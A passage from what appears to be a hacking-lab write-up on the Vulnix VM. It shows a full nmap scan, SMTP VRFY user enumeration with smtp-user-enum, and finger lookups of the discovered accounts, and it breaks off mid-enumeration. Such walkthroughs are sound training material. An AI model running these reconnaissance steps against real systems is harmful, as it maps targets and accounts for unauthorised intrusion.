HackLab: Vulnix
Service discovery:
First, I fired up HaGashash in order to gain some information about which host to attack and what interesting services run there. (https://github.com/Gandosha/HaGashash).
[GandoPC ~]# go run go/src/github.com/Gandosha/HaGashash/main.go -interface=enp0s3 -project=HackLab:_Vulnix -subnet=true <-=|HaGashash by Gandosha|=-> [+] nmap executable is in '/usr/bin/nmap' [+] ifconfig executable is in '/usr/bin/ifconfig' [!] Dependencies check is completed successfully. [!] Starting to scan your subnet. [+] Alive hosts in 192.168.43.0/24 are: 192.168.43.1 192.168.43.2 192.168.43.3 192.168.43.4 [+] Directory created at: /HaGashash_Projects/HackLab:_Vulnix/192.168.43.1. [!] Starting to scan 192.168.43.1 for TCP interesting stuff. [!] Starting to scan 192.168.43.1 for UDP interesting stuff. [+] Directory created at: /HaGashash_Projects/HackLab:_Vulnix/192.168.43.2. [!] Starting to scan 192.168.43.2 for TCP interesting stuff. [!] Starting to scan 192.168.43.2 for UDP interesting stuff. [+] Directory created at: /HaGashash_Projects/HackLab:_Vulnix/192.168.43.3. [!] Starting to scan 192.168.43.3 for TCP interesting stuff. [!] Starting to scan 192.168.43.3 for UDP interesting stuff. [+] Directory created at: /HaGashash_Projects/HackLab:_Vulnix/192.168.43.4. [!] Starting to scan 192.168.43.4 for UDP interesting stuff. [!] Starting to scan 192.168.43.4 for TCP interesting stuff. [+] Nmap's TCP script scanning on 192.168.43.4 is completed successfully. [+] Nmap's UDP script scanning on 192.168.43.4 is completed successfully. [+] Nmap's TCP script scanning on 192.168.43.3 is completed successfully. [+] Nmap's TCP script scanning on 192.168.43.1 is completed successfully. [+] Nmap's TCP script scanning on 192.168.43.2 is completed successfully. [+] Nmap's UDP script scanning on 192.168.43.3 is completed successfully. [+] Nmap's UDP script scanning on 192.168.43.2 is completed successfully. [+] Nmap's UDP script scanning on 192.168.43.1 is completed successfully. [+] Summary file for 192.168.43.4 is ready. [+] Summary file for 192.168.43.3 is ready. [+] Summary file for 192.168.43.2 is ready. [+] Summary file for 192.168.43.1 is ready. [gandosha@GandoPC 192.168.43.4]$ cat nmap_TCP_scan_output # Nmap 7.70 scan initiated Tue Oct 16 13:53:29 2018 as: nmap -sS -p- -A -T4 -Pn -vv -oN /HaGashash_Projects/HackLab:_Vulnix/192.168.43.4/nmap_TCP_scan_output 192.168.43.4 mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers Nmap scan report for 192.168.43.4 Host is up, received arp-response (0.0028s latency). Scanned at 2018-10-16 13:53:31 IDT for 35s Not shown: 65518 closed ports Reason: 65518 resets PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA) | ssh-dss AAAAB3NzaC1kc3MAAACBAJJHCFDFkbuQTVpmQvCvdR2poQrsZOQ0nBEsUij15T9DAiUhxI41G8hQ97MM9Qe0eGdP7HsA8vkZnglainhktvPe1NN9+XnDVRziI3dEqSxpCi4obxxYdKtqGBIj83dOPpxm09xDhVYBdh7ZlZh8xttD+ACFqmN4VZjmv0IlSYZFAAAAFQC6Z+j+KbT59gBXSPQTpAJIh0FE2wAAAIEAgYwA5oFVMQdKfRwAxbLoADx3t735BpLIoVNX2j4UrAF8CmwLCmcsNAhdpUP+hMhKGXnP5co2nira3OkcwWRu219bjte7m1l9JOvCJUASTUzOC0CUJkm9wO40/gyJOelKRR37r0qnBImiEumL6dSpcg4b0IfozCI9UJGh/yiEu4kAAACASWk2tKCyCHamiXwIt0XdwTXubZYtRtH09LHdisSEsoinz+2szuzbqnwgancHXcyQ3PapixZhVNASZ8MobmkFDXh4SDS5zl+RW7K40FBh3z+HCdSAJJjkRFXWEuadjxpO2QWBYEJiER4AtFWUSl2kVMFdsWqYaK7BxStNNkmGBII= | 2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1jCDgzdowLQVOEXrczN+xbuMcNkncz2EfCEncP7k8rhNjQq+eXzMKEfULxMLh/wLFhX2TVZDECTpQ0WVJckgkGeZSdvmEJKt5LbZlSm5HAz/DMUKIuohDRI4F3lqn9u5VAVKSyTXyR3EuxCsCHJy+Xf40BJImr+fZ7yH3xwPPqJ9in+LfgTXaRItqLDHiHAsTIXXwsDgweaS9hSTAR1MO+TdZCnXKPJ1NEt38+Fl7rnTnBE2TdtU3iyrlWXE0GGGg0bgldqas7bR4UH/uRZZOZK2+UTf0qg30H7ll8ShfZIbdW+59RfQqYz8tZYsoWoxahWf3dmx5soCWWcAP7DAV | 256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA) |_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGEudclsh1beHM/DPWQGR31dOGqdLcXVj1xLG/YSGfiNmN1pT6x0MwYQyN6pzCzzonljThH8JwIZjid+JN2PzxE= 25/tcp open smtp syn-ack ttl 64 Postfix smtpd |_smtp-commands: vulnix, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, | ssl-cert: Subject: commonName=vulnix | Issuer: commonName=vulnix | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2012-09-02T17:40:12 | Not valid after: 2022-08-31T17:40:12 | MD5: 58e3 f1ac fef6 b6d1 744c 836f ba24 4f0a | SHA-1: 712f 69ba 8c54 32e5 711c 898b 55ab 0a83 44a0 420b | -----BEGIN CERTIFICATE----- | MIICnjCCAYYCCQCrWhznjAI2hTANBgkqhkiG9w0BAQUFADARMQ8wDQYDVQQDEwZ2 | dWxuaXgwHhcNMTIwOTAyMTc0MDEyWhcNMjIwODMxMTc0MDEyWjARMQ8wDQYDVQQD | EwZ2dWxuaXgwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDDbiWM7/Xk | 7+VnQuSzKIy6GgD9xAw5jCnKmRY6MfJ0jNmpIjo70LEpoTTEZvFLwKbdkxQHzusv | 50GOrZLm6MkrB2Ad8skvkJR9PA05KoM+Uha5P35rdF0MaNPtHRpA5W3Ql3qAoph7 | 8hGmdI4GrLmedxkmajniCYNpowArI7UjYA5FWF6q1m41CS+xCqk9u4qH8SrV616z | bJ2H00mhp0NJDJbTDX35biGeGKR70e5xQAkMwQKM6s9iLBo2nrH2JKyxfVMeMgQf | KoRJEeILZbgP4X9Xc6iA9GuNSqluObOhCv1RsFLP915xNvnf6aZf8EtyODISzXhj | GBsy//uolXMLAgMBAAEwDQYJKoZIhvcNAQEFBQADggEBAIJHgnARP3nuoFigE9vE | CyK9sKYPn+nh0xOMFil2LzfcZsVRqTl0T/VbOug1i+pettkcPqWBBNs1Q5uSEIuP | 0pEq9AQdeLk7weMa0trDK+XoSbEvcAvYPnbK6Ghr343FE74nmxewtfCbrNfEnYZB | TYlEElBqcQFSo4kB6UyMOOGwuIJ7EHITPa7ZxKW6OBOVOzCUiYm3hGn7dpyVeaH/ | zpSwobV1pSqyW7+Tb3KO82lqSnmYvRzk3TmIVXutOXTVE+L58xbo5uafae2UvP4m | m5Be1rZi17Ub1kIMKT+OJLq2oaDb6Y8Ni/a267RoGO/TcwCLjKHsDl5Niwk6rYMX | ZtY= |_-----END CERTIFICATE----- |_ssl-date: 2018-10-16T10:53:56+00:00; -1s from scanner time. 79/tcp open finger syn-ack ttl 64 Linux fingerd |_finger: No one logged on.\x0D 110/tcp open pop3 syn-ack ttl 64 Dovecot pop3d |_pop3-capabilities: PIPELINING SASL RESP-CODES CAPA UIDL TOP STLS | ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server/emailAddress=root@vulnix/organizationalUnitName=vulnix | Issuer: commonName=vulnix/organizationName=Dovecot mail server/emailAddress=root@vulnix/organizationalUnitName=vulnix | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2012-09-02T17:40:22 | Not valid after: 2022-09-02T17:40:22 | MD5: 2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc | SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e | -----BEGIN CERTIFICATE----- | MIIDizCCAnOgAwIBAgIJAKvS691t83I+MA0GCSqGSIb3DQEBBQUAMFwxHDAaBgNV | BAoME0RvdmVjb3QgbWFpbCBzZXJ2ZXIxDzANBgNVBAsMBnZ1bG5peDEPMA0GA1UE | AwwGdnVsbml4MRowGAYJKoZIhvcNAQkBFgtyb290QHZ1bG5peDAeFw0xMjA5MDIx | NzQwMjJaFw0yMjA5MDIxNzQwMjJaMFwxHDAaBgNVBAoME0RvdmVjb3QgbWFpbCBz | ZXJ2ZXIxDzANBgNVBAsMBnZ1bG5peDEPMA0GA1UEAwwGdnVsbml4MRowGAYJKoZI | hvcNAQkBFgtyb290QHZ1bG5peDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC | ggEBALv7qqgwWV56bHtf/0PqD6yMN1bv866H5gqrVENXrfaL8ZOiNCD9/Fg6jOuh | VLV5iw5y8lKNdMZW5PWHN8mQEeoyWWFXMV1X4RLvOuTIf1sXNHp+IcwZpDDobHzQ | ENhpwhlWTxdObUEVVT/ChOTaAQIpi9AFzo4fjJ4UEHfEae98cssmuqQP9Unj9xKv | vCj181l3g9VAQ92KjxWeWMa8e+ecwBVtAsPdU3ZwmwVIuVnBDa9nRdkR0y31RWSr | /Lil4ckL0TZ4K92z146pTex7QSNKGHyuLPJGddm5pu11WP5cJEz9O2MDOo6WEISb | V7EEpfbvrA6cd+ISf4dGSyNZfp8CAwEAAaNQME4wHQYDVR0OBBYEFACM4N/xHviz | b3W/Qea+BvYb3O7AMB8GA1UdIwQYMBaAFACM4N/xHvizb3W/Qea+BvYb3O7AMAwG | A1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEBAEP1Kk3MagUfM6kOLgK++4gV | LJzOC1OGQ/ERyNRhk8JgVbhuasrC7hNtzk2ku7yP4H8IlVzjs4EGQOxoGKHnrzBr | 76iqlQRASZbJPwemc1CpRbh7XTZAOPHUbihycpG4iQZD2/55c6Az+TcyHLqjPbCW | YVCAB8mMXDtYEB4OiOEvbulud5fjXAu7ba8tzUSqAWF7dA9S/vcmmnCC+y1nV9Tc | 8K1+edk6WTOjoQEALUA5ikfB8I8O95AWPkfcj77BOiPOvPlEGlaWm85DMRkVOatg | mqDiJCaX/SajIW22LgEw81ErtM8m6RAZ1qN+sf9O6T7+Mxvbd6aPx/bxj/LwQ6c= |_-----END CERTIFICATE----- |_ssl-date: 2018-10-16T10:53:57+00:00; 0s from scanner time. 111/tcp open rpcbind syn-ack ttl 64 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/udp nfs | 100005 1,2,3 41645/tcp mountd | 100005 1,2,3 47493/udp mountd | 100021 1,3,4 50218/udp nlockmgr | 100021 1,3,4 60141/tcp nlockmgr | 100024 1 51815/udp status | 100024 1 60680/tcp status | 100227 2,3 2049/tcp nfs_acl |_ 100227 2,3 2049/udp nfs_acl 143/tcp open imap syn-ack ttl 64 Dovecot imapd |_imap-capabilities: more have OK listed capabilities LITERAL+ Pre-login LOGIN-REFERRALS post-login ENABLE SASL-IR ID IMAP4rev1 IDLE STARTTLS LOGINDISABLEDA0001 | ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server/emailAddress=root@vulnix/organizationalUnitName=vulnix | Issuer: commonName=vulnix/organizationName=Dovecot mail server/emailAddress=root@vulnix/organizationalUnitName=vulnix | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2012-09-02T17:40:22 | Not valid after: 2022-09-02T17:40:22 | MD5: 2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc | SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e | -----BEGIN CERTIFICATE----- | MIIDizCCAnOgAwIBAgIJAKvS691t83I+MA0GCSqGSIb3DQEBBQUAMFwxHDAaBgNV | BAoME0RvdmVjb3QgbWFpbCBzZXJ2ZXIxDzANBgNVBAsMBnZ1bG5peDEPMA0GA1UE | AwwGdnVsbml4MRowGAYJKoZIhvcNAQkBFgtyb290QHZ1bG5peDAeFw0xMjA5MDIx | NzQwMjJaFw0yMjA5MDIxNzQwMjJaMFwxHDAaBgNVBAoME0RvdmVjb3QgbWFpbCBz | ZXJ2ZXIxDzANBgNVBAsMBnZ1bG5peDEPMA0GA1UEAwwGdnVsbml4MRowGAYJKoZI | hvcNAQkBFgtyb290QHZ1bG5peDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC | ggEBALv7qqgwWV56bHtf/0PqD6yMN1bv866H5gqrVENXrfaL8ZOiNCD9/Fg6jOuh | VLV5iw5y8lKNdMZW5PWHN8mQEeoyWWFXMV1X4RLvOuTIf1sXNHp+IcwZpDDobHzQ | ENhpwhlWTxdObUEVVT/ChOTaAQIpi9AFzo4fjJ4UEHfEae98cssmuqQP9Unj9xKv | vCj181l3g9VAQ92KjxWeWMa8e+ecwBVtAsPdU3ZwmwVIuVnBDa9nRdkR0y31RWSr | /Lil4ckL0TZ4K92z146pTex7QSNKGHyuLPJGddm5pu11WP5cJEz9O2MDOo6WEISb | V7EEpfbvrA6cd+ISf4dGSyNZfp8CAwEAAaNQME4wHQYDVR0OBBYEFACM4N/xHviz | b3W/Qea+BvYb3O7AMB8GA1UdIwQYMBaAFACM4N/xHvizb3W/Qea+BvYb3O7AMAwG | A1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEBAEP1Kk3MagUfM6kOLgK++4gV | LJzOC1OGQ/ERyNRhk8JgVbhuasrC7hNtzk2ku7yP4H8IlVzjs4EGQOxoGKHnrzBr | 76iqlQRASZbJPwemc1CpRbh7XTZAOPHUbihycpG4iQZD2/55c6Az+TcyHLqjPbCW | YVCAB8mMXDtYEB4OiOEvbulud5fjXAu7ba8tzUSqAWF7dA9S/vcmmnCC+y1nV9Tc | 8K1+edk6WTOjoQEALUA5ikfB8I8O95AWPkfcj77BOiPOvPlEGlaWm85DMRkVOatg | mqDiJCaX/SajIW22LgEw81ErtM8m6RAZ1qN+sf9O6T7+Mxvbd6aPx/bxj/LwQ6c= |_-----END CERTIFICATE----- |_ssl-date: 2018-10-16T10:53:57+00:00; -1s from scanner time. 512/tcp open exec syn-ack ttl 64 netkit-rsh rexecd 513/tcp open login syn-ack ttl 64 514/tcp open shell syn-ack ttl 64 Netkit rshd 993/tcp open ssl/imap syn-ack ttl 64 Dovecot imapd |_imap-capabilities: more have Pre-login listed LITERAL+ capabilities LOGIN-REFERRALS post-login ENABLE SASL-IR OK IMAP4rev1 IDLE AUTH=PLAINA0001 ID | ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server/emailAddress=root@vulnix/organizationalUnitName=vulnix | Issuer: commonName=vulnix/organizationName=Dovecot mail server/emailAddress=root@vulnix/organizationalUnitName=vulnix | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2012-09-02T17:40:22 | Not valid after: 2022-09-02T17:40:22 | MD5: 2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc | SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e | -----BEGIN CERTIFICATE----- | MIIDizCCAnOgAwIBAgIJAKvS691t83I+MA0GCSqGSIb3DQEBBQUAMFwxHDAaBgNV | BAoME0RvdmVjb3QgbWFpbCBzZXJ2ZXIxDzANBgNVBAsMBnZ1bG5peDEPMA0GA1UE | AwwGdnVsbml4MRowGAYJKoZIhvcNAQkBFgtyb290QHZ1bG5peDAeFw0xMjA5MDIx | NzQwMjJaFw0yMjA5MDIxNzQwMjJaMFwxHDAaBgNVBAoME0RvdmVjb3QgbWFpbCBz | ZXJ2ZXIxDzANBgNVBAsMBnZ1bG5peDEPMA0GA1UEAwwGdnVsbml4MRowGAYJKoZI | hvcNAQkBFgtyb290QHZ1bG5peDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC | ggEBALv7qqgwWV56bHtf/0PqD6yMN1bv866H5gqrVENXrfaL8ZOiNCD9/Fg6jOuh | VLV5iw5y8lKNdMZW5PWHN8mQEeoyWWFXMV1X4RLvOuTIf1sXNHp+IcwZpDDobHzQ | ENhpwhlWTxdObUEVVT/ChOTaAQIpi9AFzo4fjJ4UEHfEae98cssmuqQP9Unj9xKv | vCj181l3g9VAQ92KjxWeWMa8e+ecwBVtAsPdU3ZwmwVIuVnBDa9nRdkR0y31RWSr | /Lil4ckL0TZ4K92z146pTex7QSNKGHyuLPJGddm5pu11WP5cJEz9O2MDOo6WEISb | V7EEpfbvrA6cd+ISf4dGSyNZfp8CAwEAAaNQME4wHQYDVR0OBBYEFACM4N/xHviz | b3W/Qea+BvYb3O7AMB8GA1UdIwQYMBaAFACM4N/xHvizb3W/Qea+BvYb3O7AMAwG | A1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEBAEP1Kk3MagUfM6kOLgK++4gV | LJzOC1OGQ/ERyNRhk8JgVbhuasrC7hNtzk2ku7yP4H8IlVzjs4EGQOxoGKHnrzBr | 76iqlQRASZbJPwemc1CpRbh7XTZAOPHUbihycpG4iQZD2/55c6Az+TcyHLqjPbCW | YVCAB8mMXDtYEB4OiOEvbulud5fjXAu7ba8tzUSqAWF7dA9S/vcmmnCC+y1nV9Tc | 8K1+edk6WTOjoQEALUA5ikfB8I8O95AWPkfcj77BOiPOvPlEGlaWm85DMRkVOatg | mqDiJCaX/SajIW22LgEw81ErtM8m6RAZ1qN+sf9O6T7+Mxvbd6aPx/bxj/LwQ6c= |_-----END CERTIFICATE----- |_ssl-date: 2018-10-16T10:53:56+00:00; 0s from scanner time. 995/tcp open ssl/pop3 syn-ack ttl 64 Dovecot pop3d |_pop3-capabilities: PIPELINING SASL(PLAIN) RESP-CODES CAPA UIDL USER TOP | ssl-cert: Subject: commonName=vulnix/organizationName=Dovecot mail server/emailAddress=root@vulnix/organizationalUnitName=vulnix | Issuer: commonName=vulnix/organizationName=Dovecot mail server/emailAddress=root@vulnix/organizationalUnitName=vulnix | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2012-09-02T17:40:22 | Not valid after: 2022-09-02T17:40:22 | MD5: 2b3f 3e28 c85d e10c 7b7a 2435 c5e7 84fc | SHA-1: 4a49 a407 01f1 37c8 81a3 4519 981b 1eee 6856 348e | -----BEGIN CERTIFICATE----- | MIIDizCCAnOgAwIBAgIJAKvS691t83I+MA0GCSqGSIb3DQEBBQUAMFwxHDAaBgNV | BAoME0RvdmVjb3QgbWFpbCBzZXJ2ZXIxDzANBgNVBAsMBnZ1bG5peDEPMA0GA1UE | AwwGdnVsbml4MRowGAYJKoZIhvcNAQkBFgtyb290QHZ1bG5peDAeFw0xMjA5MDIx | NzQwMjJaFw0yMjA5MDIxNzQwMjJaMFwxHDAaBgNVBAoME0RvdmVjb3QgbWFpbCBz | ZXJ2ZXIxDzANBgNVBAsMBnZ1bG5peDEPMA0GA1UEAwwGdnVsbml4MRowGAYJKoZI | hvcNAQkBFgtyb290QHZ1bG5peDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC | ggEBALv7qqgwWV56bHtf/0PqD6yMN1bv866H5gqrVENXrfaL8ZOiNCD9/Fg6jOuh | VLV5iw5y8lKNdMZW5PWHN8mQEeoyWWFXMV1X4RLvOuTIf1sXNHp+IcwZpDDobHzQ | ENhpwhlWTxdObUEVVT/ChOTaAQIpi9AFzo4fjJ4UEHfEae98cssmuqQP9Unj9xKv | vCj181l3g9VAQ92KjxWeWMa8e+ecwBVtAsPdU3ZwmwVIuVnBDa9nRdkR0y31RWSr | /Lil4ckL0TZ4K92z146pTex7QSNKGHyuLPJGddm5pu11WP5cJEz9O2MDOo6WEISb | V7EEpfbvrA6cd+ISf4dGSyNZfp8CAwEAAaNQME4wHQYDVR0OBBYEFACM4N/xHviz | b3W/Qea+BvYb3O7AMB8GA1UdIwQYMBaAFACM4N/xHvizb3W/Qea+BvYb3O7AMAwG | A1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEBAEP1Kk3MagUfM6kOLgK++4gV | LJzOC1OGQ/ERyNRhk8JgVbhuasrC7hNtzk2ku7yP4H8IlVzjs4EGQOxoGKHnrzBr | 76iqlQRASZbJPwemc1CpRbh7XTZAOPHUbihycpG4iQZD2/55c6Az+TcyHLqjPbCW | YVCAB8mMXDtYEB4OiOEvbulud5fjXAu7ba8tzUSqAWF7dA9S/vcmmnCC+y1nV9Tc | 8K1+edk6WTOjoQEALUA5ikfB8I8O95AWPkfcj77BOiPOvPlEGlaWm85DMRkVOatg | mqDiJCaX/SajIW22LgEw81ErtM8m6RAZ1qN+sf9O6T7+Mxvbd6aPx/bxj/LwQ6c= |_-----END CERTIFICATE----- |_ssl-date: 2018-10-16T10:53:55+00:00; -1s from scanner time. 2049/tcp open nfs_acl syn-ack ttl 64 2-3 (RPC #100227) 36654/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005) 41645/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005) 43602/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005) 60141/tcp open nlockmgr syn-ack ttl 64 1-4 (RPC #100021) 60680/tcp open status syn-ack ttl 64 1 (RPC #100024) MAC Address: 08:00:27:AF:E3:88 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 2.6.X|3.X OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 OS details: Linux 2.6.32 - 3.10 TCP/IP fingerprint: OS:SCAN(V=7.70%E=4%D=10/16%OT=22%CT=1%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=5B OS:C5C34E%P=x86_64-unknown-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=Z%II= OS:I%TS=8)OPS(O1=M5B4ST11NW3%O2=M5B4ST11NW3%O3=M5B4NNT11NW3%O4=M5B4ST11NW3% OS:O5=M5B4ST11NW3%O6=M5B4ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W OS:6=3890)ECN(R=Y%DF=Y%TG=40%W=3908%O=M5B4NNSNW3%CC=Y%Q=)T1(R=Y%DF=Y%TG=40% OS:S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O= OS:%RD=0%Q=)T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%TG=4 OS:0%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0 OS:%Q=)U1(R=N)IE(R=Y%DFI=N%TG=40%CD=S) Uptime guess: 198.047 days (since Sun Apr 1 12:45:48 2018) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=261 (Good luck!) IP ID Sequence Generation: All zeros Service Info: Host: vulnix; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 0s, deviation: 0s, median: -1s TRACEROUTE HOP RTT ADDRESS 1 2.80 ms 192.168.43.4 Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Oct 16 13:54:06 2018 -- 1 IP address (1 host up) scanned in 38.08 seconds
Port 25 check:
Port 25 is open and it can expose information about users of the system using VRFY command.
I ran smtp-user-enum using VRFY method in order to verify what users exist.
[GandoPC 192.168.43.4]# smtp-user-enum -M VRFY -U /home/gandosha/Desktop/SecLists/wordlists/unix_users.txt -t 192.168.43.4 > usernames_exist [GandoPC 192.168.43.4]# cat usernames_exist Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum ) ---------------------------------------------------------- | Scan Information | ---------------------------------------------------------- Mode ..................... VRFY Worker Processes ......... 5 Usernames file ........... /home/gandosha/Desktop/SecLists/wordlists/unix_users.txt Target count ............. 1 Username count ........... 112 Target TCP port .......... 25 Query timeout ............ 5 secs Target domain ............ ######## Scan started at Tue Oct 16 14:24:25 2018 ######### 192.168.43.4: ROOT exists 192.168.43.4: backup exists 192.168.43.4: bin exists 192.168.43.4: daemon exists 192.168.43.4: games exists 192.168.43.4: gnats exists 192.168.43.4: irc exists 192.168.43.4: list exists 192.168.43.4: libuuid exists 192.168.43.4: lp exists 192.168.43.4: mail exists 192.168.43.4: man exists 192.168.43.4: messagebus exists 192.168.43.4: news exists 192.168.43.4: nobody exists 192.168.43.4: postmaster exists 192.168.43.4: proxy exists 192.168.43.4: root exists 192.168.43.4: sshd exists 192.168.43.4: sync exists 192.168.43.4: sys exists 192.168.43.4: syslog exists 192.168.43.4: user exists 192.168.43.4: uucp exists 192.168.43.4: www-data exists ######## Scan completed at Tue Oct 16 14:24:26 2018 ######### 25 results. 112 queries in 1 seconds (112.0 queries / sec)
Port 79 check:
Finger is a program you can use to find information about computer users.
I had to install netkit-bsd-finger (in arch using yaourt) and check all those users:
[gandosha@GandoPC 192.168.43.4]$ finger -l root@192.168.43.4 [192.168.43.4] Login: root Name: root Directory: /root Shell: /bin/bash Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l backup@192.168.43.4 [192.168.43.4] Login: backup Name: backup Directory: /var/backups Shell: /bin/sh Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l bin@192.168.43.4 [192.168.43.4] Login: bin Name: bin Directory: /bin Shell: /bin/sh Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l daemon@192.168.43.4 [192.168.43.4] Login: daemon Name: daemon Directory: /usr/sbin Shell: /bin/sh Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l games@192.168.43.4 [192.168.43.4] Login: games Name: games Directory: /usr/games Shell: /bin/sh Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l gnats@192.168.43.4 [192.168.43.4] Login: gnats Name: Gnats Bug-Reporting System (admin) Directory: /var/lib/gnats Shell: /bin/sh Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l irc@192.168.43.4 [192.168.43.4] Login: irc Name: ircd Directory: /var/run/ircd Shell: /bin/sh Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l list@192.168.43.4 [192.168.43.4] Login: list Name: Mailing List Manager Directory: /var/list Shell: /bin/sh Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l libuuid@192.168.43.4 [192.168.43.4] Login: libuuid Name: Directory: /var/lib/libuuid Shell: /bin/sh Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l lp@192.168.43.4 [192.168.43.4] Login: lp Name: lp Directory: /var/spool/lpd Shell: /bin/sh Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l mail@192.168.43.4 [192.168.43.4] Login: mail Name: mail Directory: /var/mail Shell: /bin/sh Never logged in. No mail. No Plan. Login: dovecot Name: Dovecot mail server Directory: /usr/lib/dovecot Shell: /bin/false Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l man@192.168.43.4 [192.168.43.4] Login: man Name: man Directory: /var/cache/man Shell: /bin/sh Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l messagebus@192.168.43.4 [192.168.43.4] Login: messagebus Name: Directory: /var/run/dbus Shell: /bin/false Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l news@192.168.43.4 [192.168.43.4] Login: news Name: news Directory: /var/spool/news Shell: /bin/sh Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l nobody@192.168.43.4 [192.168.43.4] Login: nobody Name: nobody Directory: /nonexistent Shell: /bin/sh Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l postmaster@192.168.43.4 [192.168.43.4] finger: postmaster: no such user. [gandosha@GandoPC 192.168.43.4]$ finger -l proxy@192.168.43.4 [192.168.43.4] Login: proxy Name: proxy Directory: /bin Shell: /bin/sh Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l sshd@192.168.43.4 [192.168.43.4] Login: sshd Name: Directory: /var/run/sshd Shell: /usr/sbin/nologin Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l sync@192.168.43.4 [192.168.43.4] Login: sync Name: sync Directory: /bin Shell: /bin/sync Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l sys@192.168.43.4 [192.168.43.4] Login: sys Name: sys Directory: /dev Shell: /bin/sh Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l syslog@192.168.43.4 [192.168.43.4] Login: syslog Name: Directory: /home/syslog Shell: /bin/false Never logged in. No mail. No Plan. [gandosha@GandoPC 192.168.43.4]$ finger -l user@192.168.43.4 [192.168.43.4] Login: user Name: user Directory: /home/user Shell: /bin/bash Never logged in. No mail. No Plan. Login: dovenull Name: Dovecot login user Directory: /nonexistent Shell: /bin/false Never logged in. No mail. No 